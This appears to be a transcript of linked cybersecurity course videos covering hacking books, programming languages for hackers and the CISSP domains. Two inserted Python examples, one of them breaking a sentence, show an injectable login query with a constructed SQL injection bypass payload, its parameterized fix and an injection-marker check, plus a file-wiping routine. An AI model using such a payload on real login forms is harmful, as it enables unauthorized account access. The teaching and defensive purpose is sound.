When a system’s vulnerabilities are discovered and exploited with the motive of ensuring system security, it is known as ethical hacking. People who carry this out are termed ethical hackers. Ethical hackers perform hacking with prior permission from the concerned authorities. In order to perform this and carry out penetration testing, various hacking techniques and tools are used. Now let’s go ahead and have a look at how books can help you learn to hack. The books we are going to talk about in this live session will familiarize you with hacking on the whole. These books will introduce you to new ideas and help you solve problems. Reading in general is great, as it helps with your thought process and keeps you mentally alert. It is important that you use the information in the upcoming books only for lawful purposes. So let’s get started and see the best books that can help you with hacking.

The first book we have is The Basics of Hacking and Penetration Testing. This book is written by Patrick Engebretson. For all you beginners out there, if you’re clueless about how to go about hacking, then this is a good read for you. Having said that, this book is not just for beginners but also for those individuals who have only been exposed to superficial penetration testing logic. This book dives deep into the tools and processes used by penetration testers to gain access to systems. The Basics of Hacking and Penetration Testing will help you achieve a better understanding of offensive security as well. You’ll be acquainted with the various phases of ethical hacking. The book contains seven chapters and focuses on hacking tools such as BackTrack Linux, Google reconnaissance, Nmap, Nessus, Metasploit and the Hacker Defender rootkit, to name a few. The fun part is that each chapter consists of hands-on exercises that help you interpret and implement results in each phase. This book is apt for students, beginning infosec professionals and security consultants.

The second book we have is Hacking: A Beginner’s Guide to Computer Hacking, Basic Security and Penetration Testing. It is written by John Slavio. This is yet another go-to book for beginners. This book can be your first step to a career in ethical hacking. It covers all the basics with respect to hacking, security and pen testing. The topics covered in this book are the history of hacking, types of hackers, various types of hacking attacks, basic hacking tools and software, and hiding your IP address. It also speaks about mobile hacking, hacking an email address, penetration testing and spoofing attacks.

Up next we have Hacking: The Art of Exploitation. It is written by Jon Erickson. This book has two editions, one published in 2003 and the other in 2008. This book is famous for the hacking approach it teaches. It focuses on network security and computer security. It helps you understand how to develop exploits rather than just using them. If you want to up your ethical hacking game, then this book definitely deserves a read. Hacking: The Art of Exploitation, in its second edition, introduces you to C programming from a hacker’s perspective. Out of the plethora of concepts you will learn in this book, a few crucial ones are: you will learn to program computers using C and shell scripts, and you will also be able to outplay security measures like intrusion detection systems. Having said that, you will also learn to hijack TCP connections, crack encrypted wireless traffic and speed up brute force attacks.

Let’s now have a look at the next ethical hacking book on our list, and that is Kali Linux: An Ethical Hacker’s Cookbook. This book, revolving around Kali Linux, is written by Himanshu Sharma. Kali Linux is primarily used for

advanced penetration testing and also for security auditing. It contains numerous tools geared towards various security tasks such as security research, penetration testing and so on. This book will help you get started with the installation and configuration of Kali Linux, which will enable you to perform your tests. In addition to that, you will learn to perform web application exploitation using tools such as Burp. You will also be acquainted with performing network exploitation using Metasploit and Wireshark. Lastly, you will know how to conduct advanced penetration testing. These were a few of the concepts you will be learning, besides a lot more in the book.

At number 5 we have Metasploit: The Penetration Tester’s Guide. This book is written by four authors: David Kennedy, Jim O’Gorman, Devon Kearns and Mati Aharoni. The Metasploit Framework is a powerful tool for hackers to exploit IP addresses and the ports on them. This framework makes discovering and exploiting vulnerabilities easy, but for first-time users it can be a little tricky; hence this book will teach you all about Metasploit. You will learn the framework’s interfaces, module system and more as you launch simulated attacks, after which you will move on to advanced penetration testing techniques, which include network reconnaissance, client-side attacks, wireless attacks and targeted social engineering attacks. You will also learn to integrate Nexpose, Nmap and Nessus with Metasploit to automate discovery.

Up next we have Penetration Testing: A Hands-On Introduction to Hacking. This book is written by Georgia Weidman. As the name suggests, this book gives an insight into penetration testing. A penetration tester discovers security weaknesses in operating systems, networks and applications; penetration techniques are used to gauge enterprise defenses. This book focuses on the core skills and techniques a penetration tester requires. Here you will go through the prime stages of an actual assessment, which include gathering information, uncovering vulnerabilities, gaining access to networks and so on. In addition to the above, you will learn to crack passwords with brute forcing and word lists, bypass antivirus software, automate attacks, and use the Metasploit Framework for launching exploits and writing your own Metasploit modules, among the many other learnings.

Moving on to our next book, we have The Hacker Playbook 3. The Hacker Playbook 3: Practical Guide to Penetration Testing is written by Peter Kim. This is the third iteration of The Hacker Playbook series. It brings with it new strategies, attacks, exploits, tips and tricks. Besides all the new concepts, it also highlights a few techniques from the previous versions. Many schools have incorporated this book in their teaching. The Hacker Playbook 3 Red Team Edition acquaints you with the red team. Red teams simulate real-world advanced attacks to test your organization’s defensive teams. A red teamer will accurately test and validate the overall security program. Reading The Hacker Playbook 3 will help you advance your offensive hacking skills and attack paths. In addition to that, it also focuses on real-world attacks, exploitation, custom malware, persistence and more. This heavily lab-based book incorporates several virtual machines and custom The Hacker Playbook tools.

At number eight we have Black Hat Python: Python Programming for Hackers and Pentesters. Justin Seitz is the author of this book. As you know, Python is a very strong programming language, and it comes to great use when creating powerful and effective hacking tools. Python is the language chosen by many security professionals across the world, and many exploit frameworks are written in Python. In this book you will go through the darker side of Python’s capabilities, like infecting virtual machines, writing network sniffers, creating trojans, etc. This book covers some networking fundamentals, interesting network tooling, web applications, Windows privilege escalation tricks and more. This book, as the author says, is a fun read.

Moving on, at number 9 we have The Web Application Hacker’s Handbook: Finding and Exploiting Security Flaws. It is written by Dafydd Stuttard and Marcus Pinto. This new edition focuses on updated web applications, exposing them to attacks and executing fraudulent transactions. The Web Application Hacker’s Handbook is updated to speak about the latest step-by-step methods for attacking and defending the large range of ever-evolving web applications. It also discusses new remoting frameworks, HTML5, UI redress and hybrid file attacks, to name a few. It looks into attacking authentication, attacking the application server, finding vulnerabilities in source code, etc. If you have already mastered the first edition, you can focus on the new concepts in this one.

Now let’s head to the last book on our list. At 10 we have Web Security Testing Cookbook: Systematic Techniques to Find Problems Fast. The authors of this book are Paco Hope and Ben Walther. Security testing is quite often neglected when it comes to the tests performed on web applications, but it is a very crucial one. This book teaches you how to check for the most common web security issues. It also acquaints you with installing and configuring free and good security testing tools. You will also understand how your application communicates with users, and this book will help you build tests pinpointed at AJAX functions and help you automate the tests. With the knowledge of this book and the free tools used here, you can defend your site. So those were the top 10 books for ethical hacking.

Now that you have had a look at the books, let’s move on and see how Simplilearn can help you become an ethical hacker. Simplilearn provides a Certified Ethical Hacker CEH version 10 course. This CEH certification training course provides you with hands-on training that will help you master the techniques used to penetrate network systems and defend your system against them. Simplilearn’s ethical hacking course is aligned with the latest CEH version 10 by EC-Council. Here you will learn about trojans, backdoors and countermeasures, IDS, firewalls and honeypots, advanced hacking concepts, network packet analysis, mobile and web technologies, and advanced log management. The course content includes an introduction to ethical hacking, penetration testing and ethical hacking concepts. It also speaks about SQL injection, IoT hacking and cryptography, to name a few. There are no prerequisites to take up this certification training course.

First, let’s understand the importance of knowing programming for hacking.

You might wonder if programming is a necessity to become a hacker. As you might be aware, hacking involves breaking protocols and exploiting a network; thus being a hacker requires you to understand the languages of the software you are focusing on. Hence it is required that a hacker knows coding. Having zero coding knowledge will definitely limit your opportunities in the future. Knowing different programming languages is undoubtedly an asset for hackers. Everyone wants to become a hacker today; however, it is not as easy as it is shown in numerous movies. It takes plenty of practice and programming knowledge to become an ethical hacking expert. If you want to become a hacker, it is imperative that you have a knack for programming languages. It is a known fact that some of the world’s best hackers started off as programmers.

If you know how to program, you will be able to dissect code and analyze it. You can write your own scripts or malware that can be used on the victim. Yes, there are several ready-made scripts available today; however, you might need to apply your skills in case the available scripts don’t work well for you. Sometimes, when script modification is required, you should be in a position to do that; in such a scenario, zero knowledge of the respective programming language will definitely be a hindrance. Programs can also help you automate multiple tasks that would normally take a lot of time. Code allows you to penetrate the different fields you want to hack. It will help you identify the plan behind an attack, defend against deadly hacking techniques and make your cybersecurity career worthwhile. It will help you understand the working of the target system or application before carrying out an exploit.

Now that we have an idea as to why programming is important for hackers, let us understand which programming languages a hacker should learn. There are several programming languages for hacking, and it might be overwhelming to choose from the endless list. Here we are to help you with that. Do keep in mind that your choice of programming language will also depend on the type of system you are targeting and your strategy. Let us now move on to the list of the top programming languages that are extensively used by hackers around the world. As you see on your screens, here we have the top 5 programming languages for hackers. Let us go through them one by one.

Number one on our list is one of the most popular programming languages today, that is, Python. Python is a general-purpose programming language, and in the field of hacking it is mainly used for exploit writing. It is referred to as the de facto hacking programming language. It plays a crucial role in writing hacking scripts, exploits and malicious programs. One great feature that makes hacking easy with Python is the availability of ready-made modules. For example, the os module is available if the target is a native operating system; for networking there is the socket module, and a lot more.

Python socket programming can be used for discovering vulnerabilities in a system, since Python code helps in checking the security integrity of systems, and it can also be used to exploit them. Python has a massive community that helps with third-party plugins every day. It is also an easy-to-read language with a simple syntax, which will be helpful for beginners. You can easily write automation scripts using Python, and it also makes prototyping much faster.

Moving on to our second programming language, we have JavaScript. Currently, JavaScript is one of the best programming languages for hacking web applications. A good understanding of JavaScript allows a hacker to discover vulnerabilities and carry out web exploitation. Since most web apps use JavaScript or one of its libraries, knowing JavaScript will help you discover flaws in web applications. JavaScript can be used to read saved cookies, and security experts also use JavaScript to develop cross-site scripting programs for hacking. JavaScript is known for carrying out attacks like cross-site scripting. JavaScript can also be used to spread and reproduce malware and viruses easily. Initially, JavaScript was a client-side scripting language; however, with the release of Node.js it now supports back-end development. This implies a larger field for exploitation. A hacker can now use JavaScript to snoop on typed words, inject malicious code and track browsing history, to name a few.

Number three on our list is PHP. Hypertext Preprocessor, or PHP, is a dynamic server-side programming language used to build websites. Hackers should understand PHP, as it will help them understand web hacking techniques better. Especially if you’re into web hacking, getting your hands on PHP would be an asset. PHP is used in server-side scripting. Using PHP, you could write a custom application that modifies settings on a web server and makes a target server susceptible to attacks. With the help of PHP, you can also eliminate any vulnerabilities in your code. PHP is one of the most powerful server-side languages, used in most web domains. This shows how learning PHP can help you with web hacking and also help you fight against malicious attackers. Popular content management systems run on a foundation of PHP; hence having a strong knowledge of PHP can help you protect or compromise such websites.

Next on our list of the best programming languages for hackers is SQL. SQL is the acronym for Structured Query Language. Although SQL is not a traditional programming language, it is a language used only for communicating with databases. Several systems like MySQL and PostgreSQL store their data in databases, and SQL is used to interact with such databases in order to organize, add, retrieve, delete or edit data. Having in-depth knowledge of SQL lets you comprehend the structure of a database, thereby helping you decide which scripts or tools to deploy. SQL is used for the purpose of web hacking. SQL is undoubtedly the best programming language when it comes to hacking into large databases. It will be impossible to counteract database attacks without a good understanding of SQL. Using SQL, hackers can perform an attack known as an SQL injection attack. Such an attack enables hackers to access confidential information from databases. SQL is used by hackers to develop various hacking programs based on SQL injection. SQL injection is used to bypass web application login algorithms that are weak. Such an attack can also help a hacker view and modify confidential information in databases.

Finally, at number 5 we have the C programming language. It is no surprise that we have C, the mother of all programming languages, on our list. It is used massively in the security field; it helps with exploit writing and development.
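The SQL injection login bypass described in the SQL passage above, as an added example that is not part of the original course: the weak string-built login query beside its parameterized form, plus a simple input check a defender can log on. The in-memory sqlite3 table, the user row and the sample inputs are all constructed for this illustration.

```python
"""SQL injection login bypass: vulnerable query beside the parameterized fix.

Added example (not from the course). Uses Python's built-in sqlite3 with a
constructed in-memory users table, so it runs offline.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build a constructed demo database with one user row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    # Constructed sample credential; a real app would store a password hash.
    conn.execute("INSERT INTO users VALUES ('alice', 'correct-horse')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Weak login: user input is spliced into the SQL text.

    The input becomes part of the query grammar, which is what the course
    means by SQL injection bypassing a weak login algorithm.
    """
    query = (
        "SELECT COUNT(*) FROM users WHERE username = '"
        + username + "' AND password = '" + password + "'"
    )
    (count,) = conn.execute(query).fetchone()
    return count > 0


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Hardened login: a parameterized query keeps the input as data."""
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    (count,) = conn.execute(query, (username, password)).fetchone()
    return count > 0


def looks_like_injection(value: str) -> bool:
    """Cheap input check that can feed a WAF rule or a log alert.

    A detection aid only, not a substitute for parameterized queries: it
    flags quote and comment characters that turn a literal into SQL syntax.
    """
    markers = ("'", '"', "--", "/*", ";")
    return any(m in value for m in markers)


def demo() -> dict:
    """Run both logins against the same inputs and return the outcomes."""
    conn = make_db()
    good = ("alice", "correct-horse")
    wrong = ("alice", "guess")
    # Constructed injection input: it closes the string literal and comments
    # out the password check in the vulnerable query.
    payload = ("alice' --", "anything")
    results = {
        "vulnerable_good": login_vulnerable(conn, *good),
        "vulnerable_wrong": login_vulnerable(conn, *wrong),
        "vulnerable_payload": login_vulnerable(conn, *payload),
        "safe_good": login_safe(conn, *good),
        "safe_wrong": login_safe(conn, *wrong),
        "safe_payload": login_safe(conn, *payload),
        "flagged": looks_like_injection(payload[0]),
    }
    conn.close()
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

The same input that logs in through the string-built query is rejected by the parameterized one, because the driver never lets it reach the SQL parser as syntax.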

The low-level nature of C provides an edge over other programming languages used for hacking. A hacker can use the C programming language to his or her advantage when it comes to accessing low-level hardware components such as the RAM. Security professionals mostly use C when they are required to manipulate system resources and hardware. C also helps penetration testers write programming scripts. Most operating systems and computer programs are coded in the C language; hence learning C will help hackers get an overview of the structure of operating systems. C is also used to create shellcodes, rootkits and exploits, and to build undetectable malware, keyloggers and much more. Sometimes it is also advisable to learn both C and C++, as they both come in handy for hackers.

So those were our top five programming languages for hackers. Do keep in mind that the most important step in becoming a hacker is to learn various programming languages. It will be great if you can master a variety of programming languages, as your target will not always be the same. On that note, in addition to the previously mentioned programming languages, we have an additional list of languages that are also well recognized for hacking. Let’s have a look at our honorary mentions.

First we have Ruby. The Ruby programming language has been used for exploitation for quite some time now. A close comparison can be drawn between Ruby and Python based on their syntax; however, Ruby is more web-focused. Ruby can be used to write either small or large scripts and can be used interchangeably with Bash scripting. It offers good flexibility while writing exploits. Ruby has been used by several hackers to exploit corporate systems. It is not that easy to master Ruby, and that is one reason why MNCs look for professionals who know Ruby.

Second we have Perl. Although Perl has lost its old fame, it still holds value in the hacker community for exploit writing. There are systems that still run on Perl, as it was once the go-to solution. It is a great language that can help you manipulate Linux text files and help you create tools and exploits. Perl code bases still occupy a considerable portion of corporate tools.

Third on our list is HTML. Many of you might have wondered why we didn’t mention HTML yet. Yes, no programming list is complete without mentioning HTML. Hypertext Markup Language, HTML, is the standard markup language used for creating web pages. It glues the whole internet together, and it is the language of the web. This shows the importance HTML has. An understanding of HTML is vital to play with web applications. HTML also finds its use in developing hybrid mobile and desktop apps. HTML is a must if you want to master this field. Having said that, HTML is not that tough a language to learn; hence it is advised to master HTML if you want to compromise web applications.

And finally, at 4 we have assembly language. It is undoubtedly one of the most powerful yet hardest programming languages to learn. It is a complicated low-level programming language. For hacking primitive systems, assembly is one of the best programming languages. The best part of assembly is that you can instruct machine hardware or software using it. Assembly language helps a hacker manipulate systems straight up at the architecture level. It is also the most suited coding language to build malware like viruses and trojans. It is considered to be the best language for jobs that are time-critical. Reverse engineers use assembly language; for example, if you’re interested in software cracking and want to reverse engineer a piece of software that has already been compiled, assembly is the go-to choice. As complicated as the language sounds, the results it produces are highly fruitful.

So those were the additional programming languages that can help you become a skilled and successful hacker. We should keep in mind that a strong understanding of programming languages helps cyber security professionals stay on top of

cyber criminals. So let’s start off this tutorial by understanding the need for the CISSP certification. If you have seen our previous videos, you would be aware of the various cyber security certifications like CCNA, CompTIA Security+, CISM, CISA and CEH, to name a few. You might also have come across the CISSP certification. Let me tell you, this is one of the toughest and most in-demand certifications in the cyber security field. In the current times, managing information security in a company can be extremely challenging. With the advent of the internet and various other technologies, there is a large exposure to various security breaches. The presence of information security experts in-house helps organizations manage their IT processes in a better way. This is where a CISSP professional is in demand by employers. Compared to other cybersecurity professionals, the demand for CISSP-certified professionals has grown rapidly; there are nearly 50,000 job postings for the same.

Now that you have an idea of the demand for CISSP-certified professionals, let’s move on to understanding what exactly CISSP is. CISSP stands for Certified Information Systems Security Professional. It is considered the gold standard in the field of information security. This certification is taken up by IT professionals. It trains a candidate to become an information assurance professional. Taking up the CISSP certification will help you define the design, architecture, controls and management of highly secure business environments. You will be called a CISSP professional only after you successfully pass the CISSP exam.

So now let’s have a look into the CISSP exam requirements. The primary requirement for any candidate is that they should have at least five years of work experience in the field of information security. In addition to this, it is also suggested that the candidate clears other certifications like CCNA, CompTIA Security+, CEH, CISM and CISA, to name a few. CISSP is considered an advanced-level cybersecurity certification; hence it is better if the candidate clears the basic-level and managerial-level certifications before moving to the CISSP certification. As I mentioned earlier, this certification is suitable for professionals who have a minimum of five years of work experience. Professionals working as security consultants and managers, network and security architects, IT directors, security auditors and chief information security officers can take up the CISSP certification.

Let’s now move on to our next topic, that is, CISSP domains. This entire certification is grouped into a total of eight domains. The broad spectrum of topics included in CISSP ensures its relevance across all disciplines in the field of information security. Successful candidates are competent in the following eight domains: security and risk management; asset security; security engineering; communications and network security; identity and access management; security assessment and testing; security operations; and finally software development security. These eight domains deal with different aspects of information security. We will have a look into each of these individually and understand what each of these domains signifies.

First up we have the security and risk management domain. As the name suggests, this domain mainly

consists of the fundamentals of security policies, compliance, law and regulations, professional ethics, risk management and threat modeling. Cyber security and information security play a major role in this domain. There is a difference between cyber security and information security which is more often missed out on by people: cyber security refers to several techniques used to protect the integrity of networks, whereas information security refers to processes and tools deployed to protect sensitive information.

To implement cyber security we have a list of approaches like compliance-based, ad hoc and risk-based. In compliance-based, security measures are decided based on regulations, while in ad hoc, security measures are based on no specific criteria. In risk-based, security measures are based on unique risks depending on the organization.

Let's now have a look at the CIA triad. Here C stands for confidentiality, I for integrity and A for availability. Confidentiality, integrity and availability have served as the industry standard for computer security since the time of the first mainframes. Confidentiality means that information and functions can be accessed only by authorized parties, for example military secrets. Integrity means that information and functions can be added, altered or removed only by authorized people. And availability means that systems, functions and data must be available on demand.

Now that we have understood the CIA triad, let's have a look at the GRC trilogy. This trilogy is a structured approach adopted by organizations to align IT objectives with business objectives. First up we have governance. Such a program has motives like ensuring

goals are achieved, providing strategic plans and so on. Governance is taken care of by the senior professionals of an organization. Next up we have risk management. Here the organization looks into mitigating all types of risks, such as investment, physical and cyber risks. Finally we have compliance. As discussed previously, compliance refers to abiding by the defined laws and regulations.

So who do you all think develops a security policy which is used to achieve the organization's goals? Well, it is done by the senior management of an organization. Let's have a look at the characteristics of these security policies. First and foremost, these policies should support the vision and mission of the company. All the business units should be integrated in these security policies. They should also be regularly updated. And finally, it is important that these security policies should be easy to understand, so that everyone can abide by them without any problem.

In addition to security policies, a risk analysis team is also formed in an organization to perform the analysis of each known risk. There are various steps to perform risk analysis; let's have a look at each of these. First, the team makes an assessment of the value of the company's assets. Then there is an analysis made based on the risks to assets. And finally, the team discovers solutions to mitigate these risks.

Now that was all about the first domain of CISSP, security and risk management. Let's have a look at the second domain, asset security. Asset security deals with the collection and

protection of assets such as data and devices. Here we will be looking into data classification, data management, data remnants and data loss prevention.

So in data classification, the data owner classifies data. A data owner can be an individual or a group of people who created the information and are directly responsible for it. This classification is done based on a set of predefined criteria. At the end, the classification is annually reviewed to see if there has to be some change incorporated. Data management involves managing the information life cycle needs of an enterprise in an effective manner. It also ensures that the data complies with the set standards, and finally data management also ensures data validity and integrity.

Moving on to data remnants: it is a term used for the residual digital data that is present even after trying to erase the data. Data remnants should be avoided, as data should be completely destroyed. To tackle data remnants we have methods like overwriting and destruction, to name a few. In overwriting, other information is written over the data several times so that the original data cannot be recovered. In destruction, the data in the storage device is physically damaged to make recovery difficult.

Asset security
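As an added example (not part of the course material), here is the overwriting method for data remnants carried out on a single file: several passes of random bytes, a final pass of zeros that is read back and verified, then removal. It assumes a plain local disk where rewriting the same offsets reuses the same physical blocks; on SSDs and on journaling or copy-on-write filesystems an in-place overwrite does not guarantee that every physical copy of the old data is gone, which is why the destruction method also exists.

```python
import os
import secrets
import tempfile

# Added example (not from the course): a multi-pass overwrite of a file's
# contents, the "overwriting" method for data remnants. Assumes a plain local
# disk where writing to the same offset reuses the same physical blocks.


def overwrite_in_place(path: str, passes: int = 3, chunk: int = 64 * 1024) -> int:
    """Overwrite every byte of `path` `passes` times with random data and then
    once with zeros, flushing to the device after each pass. The file is left in
    place so the final state can be verified. Returns the file size in bytes."""
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for pass_no in range(passes + 1):
            f.seek(0)
            written = 0
            while written < size:
                n = min(chunk, size - written)
                # random bytes on the first `passes` passes, zeros on the last
                data = b"\x00" * n if pass_no == passes else secrets.token_bytes(n)
                f.write(data)
                written += n
            f.flush()
            os.fsync(f.fileno())  # make the pass hit the device, not just the cache
    return size


def is_zeroed(path: str) -> bool:
    """Read-back check: True if no non-zero byte remains (also True for an empty file)."""
    with open(path, "rb") as f:
        while True:
            block = f.read(64 * 1024)
            if not block:
                return True
            if any(block):  # any() over bytes is True if a non-zero byte exists
                return False


def sanitize_file(path: str, passes: int = 3) -> int:
    """Overwrite, verify the final pass, then unlink. Returns bytes overwritten."""
    size = overwrite_in_place(path, passes)
    if not is_zeroed(path):
        raise RuntimeError("final overwrite pass did not verify; do not trust deletion")
    os.remove(path)
    return size


def demo() -> tuple:
    """Constructed sample: a temp file of placeholder 'sensitive' records.
    Returns (bytes overwritten, whether the file still exists)."""
    fd, path = tempfile.mkstemp(prefix="remnants-demo-")
    with os.fdopen(fd, "wb") as f:
        f.write(b"CONSTRUCTED-SAMPLE-RECORD\n" * 4000)  # 104000 bytes
    size = sanitize_file(path)
    return size, os.path.exists(path)


def demo_verify_only() -> tuple:
    """Overwrite without removing, so the read-back check can be inspected.
    Returns (file size, is_zeroed result) and cleans up afterwards."""
    fd, path = tempfile.mkstemp(prefix="remnants-demo-")
    with os.fdopen(fd, "wb") as f:
        f.write(secrets.token_bytes(200_000))  # constructed random payload
    try:
        size = overwrite_in_place(path, passes=2)
        return size, is_zeroed(path)
    finally:
        os.remove(path)


if __name__ == "__main__":
    print(demo(), demo_verify_only())
```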

also looks into data loss prevention. Here several measures and risk assessments are performed to ensure that information is only available to authorized users.

Let's now move on to our third domain, security engineering. As the name suggests, this domain talks about security architecture, security models, cryptography and physical security. Security architecture establishes a common practice for creating, analyzing and using architecture descriptions within a particular domain. Security architecture takes the help of the TCB, that is the trusted computing base, the security perimeter and reference models to implement security. Cryptography is also a part of security engineering. In cryptography, information is secured by converting data from a readable format to a non-readable format and vice versa.

Moving to our fourth domain, we have communications and network security. This domain is all about network structures, transmission methods and security measures used to achieve CIA in an organization. The OSI model is the foundation of networking. This model, that is the Open Systems Interconnection model, describes how data is transferred from one computer to another. The OSI model consists of seven layers, starting from the physical layer, then the data link layer, network layer, transport layer, session layer, presentation layer and finally the application layer. The first layer, that is the physical layer, transmits the raw bit stream over the physical medium. Then the data link layer defines the format of data on the network. The network layer provides logical addressing, and it also provides path determination using logical addressing. The fourth layer, that is the transport layer, provides end-to-end connections; in this layer data is transmitted using transmission protocols including TCP and UDP. The session layer maintains connections, and it is also responsible for controlling ports and sessions. The sixth layer, that is the presentation layer, ensures that data is in a usable format. And finally, in the seventh layer, that is the application layer, human-computer interaction happens; here applications can access the network services.

The communications and network security domain also talks about firewalls. We can define a firewall as hardware or software which is used to block the incoming or outgoing traffic from the internet to your computer. Then we also have the IDS. IDS is known as the

intrusion detection system. This is designed to detect unauthorized access to a system. IDS is used together with a firewall and a router.

Moving to identity and access management, the fifth domain, let's have a look at what this domain is all about. This domain of CISSP is all about access control, identification, authorization, and attacks on access control and their countermeasures. To be able to access a data set or a resource, a subject has to be identified, authenticated and authorized. Identity management, Kerberos and access criteria are a few of the crucial fields here. In identity management, through automated means, users are identified and authenticated. This domain also speaks of Kerberos, an authentication protocol that is based on symmetric key cryptography and provides end-to-end security. Access to data shouldn't be granted to anyone and everyone; in fact it should be granted based on the level of trust and the job role in the organization. It is also better if it is provided based on the location and the time.

Let's now have a look at our sixth domain, security assessment and testing. So in this domain we will look into audit, security control assessment and testing reports. As you might have heard of the term audit, it is nothing but a repeated process wherein an independent professional evaluates and analyzes evidence. Then we have vulnerability assessment, wherein IT risks are identified and evaluated; it helps in identifying, quantifying and prioritizing vulnerabilities. A well-planned and executed assessment and test strategy can provide valuable information about risk and risk mitigation. The assessment and test is executed by a working group called the integrated product team. Testing is performed to check the data flow between the application and the system.

Up next we have the security operations domain. The seventh domain of CISSP is all about investigations, monitoring and logging, disaster recovery and change management.

Here we will look into the fields of digital forensics, incident management and perimeter security. Investigation of a computer crime is also known as computer forensics. In digital forensics, data is examined to identify, recover and analyze opinions about digital information. Incident management works to restore the services to normal as soon as possible. A team called the incident response team is deployed to handle such emergencies. Incident response is defined as a practice of detecting a problem, determining its cause, minimizing the damage, resolving the problem and documenting each step. This team provides management with sufficient information and defends the company against future attacks. In perimeter security there is perimeter defense, which allows us to detect and keep a check on unauthorized physical access. This field also controls the access to the facility.

Moving on to our eighth and final domain, we have software development security. As the name suggests, this domain talks about security in a software development lifecycle. Here we will be looking into topics like APIs, malware, spyware, adware, social engineering attacks and the SQL injection attack. Let's start off with the application program interface, known as API. An API is basically a collection of protocols and functions used to create applications. It supports formats such as Representational State Transfer (REST) and Simple Object Access Protocol. REST is nothing but using the present features of the web in a simple way, and SOAP, which is an acronym for Simple Object Access Protocol, is a messaging protocol for exchanging data among computers.

Now let's move on to malware as a security threat. Malware is a term which refers to malicious software: viruses, ransomware and worms. We can also call a trojan virus a form of malware, which is capable of disguising itself as legitimate software. Malware is basically a broad term that refers to a variety of malicious programs. One way to protect your

software from malware is to always double-check your downloads.

Moving on to our next security threat, spyware. As the name suggests, this is software that typically spies on your system. Spyware is also a type of malware which is used to secretly gather information of the victim to give it to a third party. Those programs that secretly record all that you do on your computer are called spyware. It is always advised to turn on pop-up blockers to prevent spyware.

Next up we have adware. Adware is also known as advertising-supported software. It is a type of malware that constantly displays ads and pop-ups; some such ads can also gather your information at times. Adware is not all that dangerous, but it is a hassle, as it is a gateway to unwanted advertising on the screen, and it can also change the browser home page. Adware is known to display unwanted, annoying advertisements on your screens.

Let's now have a look at social engineering attacks. It is basically the art of manipulating people so that they end up giving their confidential information. This attack lures victims into handing over their confidential data. This attack takes place by tricking the human mind. The most common social engineering attacks are phishing, spear phishing and whaling. A phishing attack is a practice wherein the hacker usually sends fraudulent emails which appear to be coming from a very trusted source. This is done to install malware or to steal sensitive data like credit card information and various other login credentials. A spear phishing attack is a variation of phishing; here the attacker targets a specific individual or a group of people. And in a whaling phishing attack, wealthy, powerful and prominent individuals are made targets.

Moving on to our next attack, we have the SQL injection attack. The SQL injection attack is a type of code injection attack: in a database-driven website, the hacker manipulates a standard SQL query. It allows attackers to tamper with the existing data. Here malicious code is inserted into the SQL server to obtain information.

So in CISSP,

as with every security course, we start off with the CIA triad. Now here CIA is confidentiality, integrity and availability. So it starts off with every security mechanism. When we talk about security and we want to keep things secure, what is it that we want to secure? It is the data of an organization; that is the most valuable asset to the organization, and that's what we want to secure. When we say that we want the data to be secured, we basically talk about three aspects for that data: the first and the foremost, that the data needs to remain confidential; the second aspect, that the data needs to be trustworthy; and the third concept, that the data should be available to all authorized users when and where they require it.

So going back to the first point, when we say we want data to be confidential, what do we mean by that? By confidentiality we talk about that data being made available only to authorized users, after you have authenticated them, ensured or assured of their authenticity, and only then you're going to give access to that data, right? So even if you go into an organization, an organization has a hierarchy of governance, right? So only certain people with certain clearances or certain job titles can have access to a certain amount of data, whereas other people may not have access to it. For example, a person working in the sales department will not have access to data that is accessed by the HR department. Thus that's what we are looking at: classification of data and keeping it confidential, only making it available to those people who require it.

When we say trustworthiness, or the integrity of that data, the integrity is where the data has been altered, modified, removed, deleted by unauthorized people, so we want to prevent that. Which means, when we say we want the integrity intact, we want to ensure that only authorized people can modify, alter or remove data, if they are allowed to do so. So that's where the authorization and authentication come into the picture again.

And data needs to be available. For me to safeguard data, I can just lock it up in a safe, throw the safe in the depths of an ocean and say that the data is secure because it cannot be leaked out. But that data is no longer available to authorized users; hence the data is useless for me. Data would have value when the data remains confidential, has its trustworthiness intact and is still available to all the users that are authorized to access it. So when we talk about security, we want these three aspects to be implemented on any and every digital asset that the organization has, and thus once these three points are guaranteed, or at least assured to a certain extent, we can then say that the data or that particular asset is secured.

Moving on, let's talk about information security. Information security is the process of protecting

data and information systems. So in the CIA, as we talked about it, when we said what do we want to protect, we want to protect all the information assets or the technical assets that we have from any of the vulnerabilities that can be identified. So we want to restrict unauthorized access and use; we want to restrict deletion, accidental or intentional, if they have not been authorized to do so; modification of data, so the integrity part; and destruction of data. Destruction could not only be deleting data, but it could be something like ransomware, where the data gets encrypted, so it's still there, it's just not accessible to you.

Now information security ensures the implementation of the following aspects. The first and foremost comes from information security policies, which is the governance aspect of it. The policies are designed to have an implementation of security in an organization that helps the business processes to be executed in a secure manner. Where are these policies coming from? They come from standards or guidelines which are globally available and based on which we can start developing our security policies. For example, if I want to develop a security policy in my organization, I might want to depend on frameworks like ISO 27001, COBIT or something similar. Once I have these standards set, I would come back to procedures, procedures being how these standards are to be executed, right? For example, in my policies I ensured that I want encryption of AES-256 to be implemented; or rather, in the policy I determined that we want encryption to be implemented on a data set based on the classification of that data. So in my policies I would determine how the classification is going to work, how data is going to be classified, on what parameters, and thus once the data gets classified we are going to come back to standards, where we say if it is classified as confidential data we want to use encryption to protect that data, and we want AES-256 to be utilized for encryption. So how do we go about it, how do we implement the encryption? That's where your procedures come into the picture. Your guidelines are troubleshooting mechanisms, optional documents; so if somebody has trouble following the procedures, they might want to go into the guidelines and see how to troubleshoot the scenario that they are facing.

Baselines are basically the minimum achievable target that you want to go with with these policies. So let's say, when I say I want to have a baseline on a server: for the server to be published onto the internet or to be used in a production environment, it has to meet certain criteria, which means I can go back to the hardware and I can say the server needs a hardware configuration of X, Y and Z, let's say a Xeon processor with 16 cores, 128 gigs of RAM. So that's a baseline that I need for a particular server for it to be put into a production environment

for a particular use. Anything above that is acceptable, but nothing should go below that.

